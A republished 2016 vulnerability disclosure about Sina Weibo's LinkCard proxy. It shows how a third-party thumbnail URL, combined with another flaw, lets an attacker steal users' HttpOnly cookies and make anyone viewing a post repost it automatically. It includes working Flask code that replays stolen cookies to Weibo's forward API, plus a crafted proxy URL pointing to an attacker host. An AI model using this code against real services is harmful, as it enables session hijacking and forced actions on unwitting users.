神刀安全网

漏洞标题: 盗取用户httponly cookie组合另外一个设计缺陷实现看了微博就转发等功能

漏洞详情

披露状态:

2016-04-03: 细节已通知厂商并且等待厂商处理中
2016-04-06: 厂商已经确认,细节仅向厂商公开
2016-04-16: 细节向核心白帽子及相关领域专家公开
2016-04-26: 细节向普通白帽子公开
2016-05-06: 细节向实习白帽子公开
2016-05-21: 细节向公众公开

简要描述:

我是好人,所有的测试cookie都没有进行保存。

详细说明:

微博的LinkCard API真的不打算改一下?

在新浪微博分享的时候,如果插入的链接接入了新浪微博的Link Card,则可以实现解析成为特殊的样式进行展示。而在接入视频截图的时候,使用的URL为第三方提供的URL,这个问题会导致在weibo.com的域名下发起一个GET请求。

组合http://wooyun.org/bugs/wooyun-2016-0191864这个漏洞,就可以实现获取用户的Cookie,转发指定的微博,从而实现扩散式的传播。

漏洞证明:

代码:

code 区域
import requests 
from flask import Flask, request, jsonify

app = Flask(__name__)

cuids = set()

@app.route('/weibo')
def weibo():
cuid = request.args.get('cuid')
global cuids
if cuid in cuids:
return ''
if len(cuids) > 10000:
return ''
cuids.add(cuid)

url = 'http://weibo.com/aj/v6/mblog/forward'
headers = {
'Cookie': request.headers.get('Cookie'),
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36',
'X-Requested-With': 'XMLHttpRequest',
'Accept': '*/*',
'Referer': 'http://weibo.com/'
}
data = {
'style_type': '1',
'_t': '0',
'mid': '3959947660627622',
'rank': '0',
'reason': 'Share!!!',
'location': 'v6_content_home',
'group_source': 'group_all',
'rid': '0_0_1_2666908952746005564'
}
print requests.post(url, headers=headers, data=data)
return ''

if __name__ == "__main__":
app.run(debug=True)

在AcFun上发一个视频,改成:

http://weibo.com/p/aj/proxy?api=http%3A%2F%2Fcontentrecommend.mobile.sina.cn.xxx.com/weibo 然后将这个视频分享到微博中。就可以实现看到这条微博的人自动转发,一个大V受害者。

漏洞标题:  盗取用户httponly cookie组合另外一个设计缺陷实现看了微博就转发等功能

修复方案:

那个视频截图 还是先上传到新浪自己的服务器吧?

版权声明:转载请注明来源 zhchbin@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 盗取用户httponly cookie组合另外一个设计缺陷实现看了微博就转发等功能

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址